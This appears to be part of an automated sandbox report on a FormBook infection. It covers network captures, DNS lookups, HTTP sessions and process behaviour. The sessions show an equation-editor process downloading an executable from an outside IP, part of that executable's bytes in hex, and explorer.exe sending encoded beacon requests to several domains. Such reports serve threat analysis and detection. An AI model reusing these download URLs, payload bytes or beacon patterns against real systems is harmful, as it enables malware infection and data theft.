Jul 22, 2021 17:11:02.518740892 CEST | 49167 | 80 | 192.168.2.22 | 103.155.80.130
Jul 22, 2021 17:11:02.518743038 CEST | 49167 | 80 | 192.168.2.22 | 103.155.80.130
Jul 22, 2021 17:11:02.518745899 CEST | 49167 | 80 | 192.168.2.22 | 103.155.80.130
Jul 22, 2021 17:11:02.518748999 CEST | 49167 | 80 | 192.168.2.22 | 103.155.80.130
Jul 22, 2021 17:11:02.518750906 CEST | 49167 | 80 | 192.168.2.22 | 103.155.80.130
Jul 22, 2021 17:11:02.518814087 CEST | 80 | 49167 | 103.155.80.130 | 192.168.2.22
Jul 22, 2021 17:11:02.520396948 CEST | 49167 | 80 | 192.168.2.22 | 103.155.80.130
Jul 22, 2021 17:11:02.848548889 CEST | 80 | 49167 | 103.155.80.130 | 192.168.2.22
Jul 22, 2021 17:11:02.848587990 CEST | 80 | 49167 | 103.155.80.130 | 192.168.2.22
Jul 22, 2021 17:11:02.848612070 CEST | 80 | 49167 | 103.155.80.130 | 192.168.2.22
Jul 22, 2021 17:11:02.848634958 CEST | 80 | 49167 | 103.155.80.130 | 192.168.2.22
Jul 22, 2021 17:11:02.848655939 CEST | 49167 | 80 | 192.168.2.22 | 103.155.80.130
Jul 22, 2021 17:11:02.848656893 CEST | 80 | 49167 | 103.155.80.130 | 192.168.2.22
Jul 22, 2021 17:11:02.848670959 CEST | 49167 | 80 | 192.168.2.22 | 103.155.80.130
Jul 22, 2021 17:11:02.848679066 CEST | 80 | 49167 | 103.155.80.130 | 192.168.2.22
Jul 22, 2021 17:11:02.848697901 CEST | 49167 | 80 | 192.168.2.22 | 103.155.80.130
Jul 22, 2021 17:11:02.848702908 CEST | 80 | 49167 | 103.155.80.130 | 192.168.2.22
Jul 22, 2021 17:11:02.848725080 CEST | 49167 | 80 | 192.168.2.22 | 103.155.80.130
Jul 22, 2021 17:11:02.848745108 CEST | 49167 | 80 | 192.168.2.22 | 103.155.80.130
Jul 22, 2021 17:11:02.848746061 CEST | 80 | 49167 | 103.155.80.130 | 192.168.2.22
Jul 22, 2021 17:11:02.848769903 CEST | 80 | 49167 | 103.155.80.130 | 192.168.2.22
Jul 22, 2021 17:11:02.848781109 CEST | 49167 | 80 | 192.168.2.22 | 103.155.80.130
Jul 22, 2021 17:11:02.848793983 CEST | 80 | 49167 | 103.155.80.130 | 192.168.2.22
Jul 22, 2021 17:11:02.848802090 CEST | 49167 | 80 | 192.168.2.22 | 103.155.80.130
Jul 22, 2021 17:11:02.848817110 CEST | 80 | 49167 | 103.155.80.130 | 192.168.2.22
Jul 22, 2021 17:11:02.848829985 CEST | 49167 | 80 | 192.168.2.22 | 103.155.80.130
Jul 22, 2021 17:11:02.848839998 CEST | 80 | 49167 | 103.155.80.130 | 192.168.2.22
Jul 22, 2021 17:11:02.848850965 CEST | 49167 | 80 | 192.168.2.22 | 103.155.80.130
Jul 22, 2021 17:11:02.848861933 CEST | 80 | 49167 | 103.155.80.130 | 192.168.2.22
Jul 22, 2021 17:11:02.848872900 CEST | 49167 | 80 | 192.168.2.22 | 103.155.80.130
Jul 22, 2021 17:11:02.848885059 CEST | 80 | 49167 | 103.155.80.130 | 192.168.2.22
Jul 22, 2021 17:11:02.848897934 CEST | 49167 | 80 | 192.168.2.22 | 103.155.80.130
Jul 22, 2021 17:11:02.848906994 CEST | 80 | 49167 | 103.155.80.130 | 192.168.2.22
Jul 22, 2021 17:11:02.848917007 CEST | 49167 | 80 | 192.168.2.22 | 103.155.80.130
Jul 22, 2021 17:11:02.848932981 CEST | 80 | 49167 | 103.155.80.130 | 192.168.2.22
Jul 22, 2021 17:11:02.848948002 CEST | 49167 | 80 | 192.168.2.22 | 103.155.80.130
Jul 22, 2021 17:11:02.848962069 CEST | 49167 | 80 | 192.168.2.22 | 103.155.80.130
Jul 22, 2021 17:11:02.850099087 CEST | 49167 | 80 | 192.168.2.22 | 103.155.80.130
Jul 22, 2021 17:11:03.175318956 CEST | 80 | 49167 | 103.155.80.130 | 192.168.2.22
Jul 22, 2021 17:11:03.175352097 CEST | 80 | 49167 | 103.155.80.130 | 192.168.2.22
Jul 22, 2021 17:11:03.175575972 CEST | 49167 | 80 | 192.168.2.22 | 103.155.80.130
Jul 22, 2021 17:11:03.176084995 CEST | 80 | 49167 | 103.155.80.130 | 192.168.2.22
Jul 22, 2021 17:11:03.176114082 CEST | 80 | 49167 | 103.155.80.130 | 192.168.2.22
Jul 22, 2021 17:11:03.176132917 CEST | 80 | 49167 | 103.155.80.130 | 192.168.2.22
Jul 22, 2021 17:11:03.176150084 CEST | 80 | 49167 | 103.155.80.130 | 192.168.2.22
Jul 22, 2021 17:11:03.176167011 CEST | 80 | 49167 | 103.155.80.130 | 192.168.2.22
Jul 22, 2021 17:11:03.176183939 CEST | 49167 | 80 | 192.168.2.22 | 103.155.80.130
Jul 22, 2021 17:11:03.176186085 CEST | 80 | 49167 | 103.155.80.130 | 192.168.2.22
Jul 22, 2021 17:11:03.176213026 CEST | 49167 | 80 | 192.168.2.22 | 103.155.80.130
Jul 22, 2021 17:11:03.176246881 CEST | 49167 | 80 | 192.168.2.22 | 103.155.80.130
Jul 22, 2021 17:11:03.177136898 CEST | 80 | 49167 | 103.155.80.130 | 192.168.2.22
Jul 22, 2021 17:11:03.177164078 CEST | 80 | 49167 | 103.155.80.130 | 192.168.2.22
Jul 22, 2021 17:11:03.177222013 CEST | 49167 | 80 | 192.168.2.22 | 103.155.80.130
Jul 22, 2021 17:11:03.177268028 CEST | 49167 | 80 | 192.168.2.22 | 103.155.80.130
Jul 22, 2021 17:11:03.177709103 CEST | 80 | 49167 | 103.155.80.130 | 192.168.2.22
Jul 22, 2021 17:11:03.177740097 CEST | 80 | 49167 | 103.155.80.130 | 192.168.2.22
Jul 22, 2021 17:11:03.177762032 CEST | 49167 | 80 | 192.168.2.22 | 103.155.80.130
Jul 22, 2021 17:11:03.177767992 CEST | 80 | 49167 | 103.155.80.130 | 192.168.2.22
Jul 22, 2021 17:11:03.177788019 CEST | 80 | 49167 | 103.155.80.130 | 192.168.2.22
Jul 22, 2021 17:11:03.177798033 CEST | 49167 | 80 | 192.168.2.22 | 103.155.80.130
Jul 22, 2021 17:11:03.177804947 CEST | 80 | 49167 | 103.155.80.130 | 192.168.2.22
Jul 22, 2021 17:11:03.177824020 CEST | 80 | 49167 | 103.155.80.130 | 192.168.2.22
Jul 22, 2021 17:11:03.177834034 CEST | 49167 | 80 | 192.168.2.22 | 103.155.80.130
Jul 22, 2021 17:11:03.177841902 CEST | 80 | 49167 | 103.155.80.130 | 192.168.2.22
Jul 22, 2021 17:11:03.177860975 CEST | 80 | 49167 | 103.155.80.130 | 192.168.2.22
Jul 22, 2021 17:11:03.177874088 CEST | 49167 | 80 | 192.168.2.22 | 103.155.80.130
Jul 22, 2021 17:11:03.177880049 CEST | 80 | 49167 | 103.155.80.130 | 192.168.2.22
Jul 22, 2021 17:11:03.177896976 CEST | 80 | 49167 | 103.155.80.130 | 192.168.2.22
Jul 22, 2021 17:11:03.177910089 CEST | 49167 | 80 | 192.168.2.22 | 103.155.80.130
Jul 22, 2021 17:11:03.177928925 CEST | 80 | 49167 | 103.155.80.130 | 192.168.2.22
Jul 22, 2021 17:11:03.177937984 CEST | 49167 | 80 | 192.168.2.22 | 103.155.80.130
Jul 22, 2021 17:11:03.177946091 CEST | 80 | 49167 | 103.155.80.130 | 192.168.2.22
Jul 22, 2021 17:11:03.177959919 CEST | 80 | 49167 | 103.155.80.130 | 192.168.2.22
Jul 22, 2021 17:11:03.177966118 CEST | 49167 | 80 | 192.168.2.22 | 103.155.80.130
Jul 22, 2021 17:11:03.177973032 CEST | 80 | 49167 | 103.155.80.130 | 192.168.2.22
Jul 22, 2021 17:11:03.177990913 CEST | 80 | 49167 | 103.155.80.130 | 192.168.2.22
Jul 22, 2021 17:11:03.177999973 CEST | 49167 | 80 | 192.168.2.22 | 103.155.80.130
Jul 22, 2021 17:11:03.178008080 CEST | 80 | 49167 | 103.155.80.130 | 192.168.2.22
Jul 22, 2021 17:11:03.178021908 CEST | 80 | 49167 | 103.155.80.130 | 192.168.2.22
Jul 22, 2021 17:11:03.178034067 CEST | 49167 | 80 | 192.168.2.22 | 103.155.80.130

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 22, 2021 17:12:26.765960932 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8
Jul 22, 2021 17:12:26.827300072 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22
Jul 22, 2021 17:12:37.045444965 CEST | 53099 | 53 | 192.168.2.22 | 8.8.8.8
Jul 22, 2021 17:12:37.119473934 CEST | 53 | 53099 | 8.8.8.8 | 192.168.2.22
Jul 22, 2021 17:12:42.149930000 CEST | 52838 | 53 | 192.168.2.22 | 8.8.8.8
Jul 22, 2021 17:12:42.290482044 CEST | 53 | 52838 | 8.8.8.8 | 192.168.2.22
Jul 22, 2021 17:12:47.553082943 CEST | 61200 | 53 | 192.168.2.22 | 8.8.8.8
Jul 22, 2021 17:12:47.622333050 CEST | 53 | 61200 | 8.8.8.8 | 192.168.2.22

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jul 22, 2021 17:12:26.765960932 CEST | 192.168.2.22 | 8.8.8.8 | 0xccff | Standard query (0) | www.thinking-diversity.com | A (IP address) | IN (0x0001)
Jul 22, 2021 17:12:37.045444965 CEST | 192.168.2.22 | 8.8.8.8 | 0x2e78 | Standard query (0) | www.compareionizers.com | A (IP address) | IN (0x0001)
Jul 22, 2021 17:12:42.149930000 CEST | 192.168.2.22 | 8.8.8.8 | 0x2f03 | Standard query (0) | www.globaltradeview.com | A (IP address) | IN (0x0001)
Jul 22, 2021 17:12:47.553082943 CEST | 192.168.2.22 | 8.8.8.8 | 0x3c4e | Standard query (0) | www.legifo.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jul 22, 2021 17:12:26.827300072 CEST | 8.8.8.8 | 192.168.2.22 | 0xccff | No error (0) | www.thinking-diversity.com | thinking-diversity.com | - | CNAME (Canonical name) | IN (0x0001)
Jul 22, 2021 17:12:26.827300072 CEST | 8.8.8.8 | 192.168.2.22 | 0xccff | No error (0) | thinking-diversity.com | - | 34.102.136.180 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:12:37.119473934 CEST | 8.8.8.8 | 192.168.2.22 | 0x2e78 | Server failure (2) | www.compareionizers.com | none | none | A (IP address) | IN (0x0001)
Jul 22, 2021 17:12:42.290482044 CEST | 8.8.8.8 | 192.168.2.22 | 0x2f03 | No error (0) | www.globaltradeview.com | - | 199.59.242.153 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:12:47.622333050 CEST | 8.8.8.8 | 192.168.2.22 | 0x3c4e | No error (0) | www.legifo.com | - | 52.58.78.16 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• 103.155.80.130
• www.thinking-diversity.com
• www.globaltradeview.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49167 | 103.155.80.130 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 17:11:01.858670950 CEST | 0 | OUT | GET /kung/bin.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 103.155.80.130
Connection: Keep-Alive
Jul 22, 2021 17:11:02.188283920 CEST | 1 | IN | HTTP/1.1 200 OK
Date: Thu, 22 Jul 2021 15:11:11 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.20
Last-Modified: Wed, 21 Jul 2021 22:09:30 GMT
ETag: "b0200-5c7a96cb69dfd"
Accept-Ranges: bytes
Content-Length: 721408
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
                                                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 35 97 f8 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 f6 0a 00 00 0a 00 00 00 00 00 00 8e 14 0b 00 00 20 00 00 00 20 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c 14 0b 00 4f 00 00 00 00 20 0b 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 f4 0a 00 00 20 00 00 00 f6 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 58 06 00 00 00 20 0b 00 00 08 00 00 00 f8 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 0b 00 00 02 00 00 00 00 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 14 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 58 ed 09 00 e4 26 01 00 03 00 00 00 e0 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e6 4f 11 7a bb aa 11 a4 54 af 14 0e 18 4e 1f b2 7e 2f e0 d0 10 2d 
e5 ba c2 08 75 c0 0a 4a 46 84 79 3f ae ef 45 5c d5 21 7f 3c f3 5f 91 c7 cb 7c 12 64 49 a9 c0 36 fc 99 f9 13 da 5c 84 10 3c a7 e6 19 6a fb 99 18 14 cc 0d 06 39 d0 cd d3 a7 8d 23 60 04 c4 87 55 cd 45 8f 04 06 13 83 62 f5 c3 bd 16 98 84 e2 ca c1 75 a7 90 70 a0 88 07 46 89 2b d3 ea 6c 71 cd f2 29 84 45 3d 6d 15 9e c0 c6 32 ce 18 e9 6d 8f 27 b8 38 2f 1a 64 6b b2 9f af c4 ac ea 15 f7 59 d1 4a 15 66 98 cc 6c 90 9b b9 68 d6 4e c0 76 b3 39 42 b6 2a da b8 a5 e2 99 f5 8e 8d 80 92 86 35 25 ee 6b 4f 55 41 4b a5 02 fb 0a 84 1d 8d 5e 0b ee e4 63 30 56 07 11 9a 30 85 44 e5 e8 1f f2 b5 d7 97 9a 83 b4 f4 99 e7 f5 1e 9b f2 f9 18 03 8a 1e e9 0e d1 53 e8 b8 c4 e6 1d 90 a1 f4 94 6b 31 ce 15 63 5f be 27 54 91 c9 7a 69 3a 8c ca fe 15 cd 42 ff 17 72 ff 2a 76 96 63 a1 4e 14 72 11 50 e4 fd 6f fe 17 f5 7b 8a ac c5 12 28 0b b2 f9 4d ee 33 c1 05 30 7c e2 6b 1f 7d 34 e3 eb 4b 69 ef c4 23 1e 79 d3 2b 54 31 55 89 11 7e 8a 0d 94 13 06 0a 2f cc 81 9b ca 8a 2e 8c fe 7b 91 de 5a 11 ec 21 6c 27 d0 3e e7 84 45 9d 45 7a 4c c0 80 51 aa 3d 37 e2 a1 c6 db 8c a7 58 94 50 ee 8f 71 66 74 81 00 af 08 d5 31 d9 25 3e dc 07 f6 8b 5e f3 05 5b 63 28 0b 10 f5 e4 0a 29 01 1f 73 9a 30 8f 18 c8 e3 b4 96 64 05 8f aa 19
                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL5`P @ `@<O X@ H.text `.rsrcX @@.reloc@@BpHX&OzTN~/-uJFy?E\!<_|dI6\<j9#`UEbupF+lq)E=m2m'8/dkYJflhNv9B*5%kOUAK^c0V0DSk1c_'Tzi:Br*vcNrPo{(M30|k}4Ki#y+T1U~/.{Z!l'>EEzLQ=7XPqft1%>^[c()s0d


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49168 | 34.102.136.180 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 17:12:26.881021023 CEST | 761 | OUT | GET /n84e/?m8ot=8pa4DPp09N0DbNR0&YP=KbrClequBVdtRHK/gZ2KmWZGYK0xt8ME2AlExBVUQacHPbAvPt6PKzpjA4rIGWPVOlDf0Q== HTTP/1.1
Host: www.thinking-diversity.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jul 22, 2021 17:12:27.021441936 CEST | 762 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Thu, 22 Jul 2021 15:12:26 GMT
Content-Type: text/html
Content-Length: 275
ETag: "60ef677e-113"
Via: 1.1 google
Connection: close
                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.22 | 49169 | 199.59.242.153 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 17:12:42.417220116 CEST | 763 | OUT | GET /n84e/?YP=YB5mtasMUEHgcdBg3w1JzInb0sE5RwTjc/Tqop+T4aXdM6WeS8rV/Q3f3EZlzbjbZYjOJg==&m8ot=8pa4DPp09N0DbNR0 HTTP/1.1
Host: www.globaltradeview.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jul 22, 2021 17:12:42.543577909 CEST | 764 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Thu, 22 Jul 2021 15:12:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_MbNuOLmRpArocewFjtxe7j2nPv6GrPLtnlRMXMGv4/ASgKgZyMsXkP3Kus6pnSH9t0pY8PHRr9ik6JxP5yOyvQ==
                                                                                                                                                  Data Raw: 66 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4d 62 4e 75 4f 4c 6d 52 70 41 72 6f 63 65 77 46 6a 74 78 65 37 6a 32 6e 50 76 36 47 72 50 4c 74 6e 6c 52 4d 58 4d 47 76 34 2f 41 53 67 4b 67 5a 79 4d 73 58 6b 50 33 4b 75 73 36 70 6e 53 48 39 74 30 70 59 38 50 48 52 72 39 69 6b 36 4a 78 50 35 79 4f 79 76 51 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 65 20 72 65 6c 61 74 65 64 20 6c 69 6e 6b 73 20 74 6f 20 77 68 61 74 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 2f 3e 3c 2f 68 65 61 64 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 36 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 36 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 37 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 3c 
62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 38 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 39 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 20 2d 2d 3e 3c 62 6f 64 79 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 67 5f 70 62 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 0a 44 54 3d 64 6f 63 75 6d 65 6e 74 2c 61 7a 78 3d 6c 6f 63 61 74 69 6f 6e 2c 44 44 3d 44 54 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 2c 61 41 43 3d 66 61 6c 73 65 2c 4c 55 3b 44 44 2e 64 65 66 65 72 3d 74 72 75 65 3b 44 44 2e 61 73 79 6e 63 3d 74 72 75 65 3b 44 44 2e 73 72 63 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 22 3b 44 44 2e 6f 6e 65
                                                                                                                                                  Data Ascii: ff9<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_MbNuOLmRpArocewFjtxe7j2nPv6GrPLtnlRMXMGv4/ASgKgZyMsXkP3Kus6pnSH9t0pY8PHRr9ik6JxP5yOyvQ=="><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title></title><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="description" content="See related links to what you are looking for."/></head>...[if IE 6 ]><body class="ie6"><![endif]-->...[if IE 7 ]><body class="ie7"><![endif]-->...[if IE 8 ]><body class="ie8"><![endif]-->...[if IE 9 ]><body class="ie9"><![endif]-->...[if (gt IE 9)|!(IE)]> --><body>...<![endif]--><script type="text/javascript">g_pb=(function(){varDT=document,azx=location,DD=DT.createElement('script'),aAC=false,LU;DD.defer=true;DD.async=true;DD.src="//www.google.com/adsense/domains/caf.js";DD.one


Code Manipulations

Statistics

Behavior

System Behavior

General

Start time: 17:10:48
Start date: 22/07/2021
Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit): false
Commandline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase: 0x13f620000
File size: 27641504 bytes
MD5 hash: 5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 17:11:09
Start date: 22/07/2021
Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit): true
Commandline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase: 0x400000
File size: 543304 bytes
MD5 hash: A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 17:11:14
Start date: 22/07/2021
Path: C:\Users\Public\vbc.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\Public\vbc.exe'
Imagebase: 0x840000
File size: 721408 bytes
MD5 hash: 750919BD7E02E7821EFA1B1BD0ED4EDA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
• Detection: 32%, ReversingLabs
Reputation: low

General

Start time: 17:11:37
Start date: 22/07/2021
Path: C:\Users\Public\vbc.exe
Wow64 process (32bit): true
Commandline: C:\Users\Public\vbc.exe
Imagebase: 0x840000
File size: 721408 bytes
MD5 hash: 750919BD7E02E7821EFA1B1BD0ED4EDA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2246289635.0000000000430000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2246289635.0000000000430000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2246289635.0000000000430000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2246311708.0000000000460000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2246311708.0000000000460000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2246311708.0000000000460000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General

Start time: 17:11:38
Start date: 22/07/2021
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
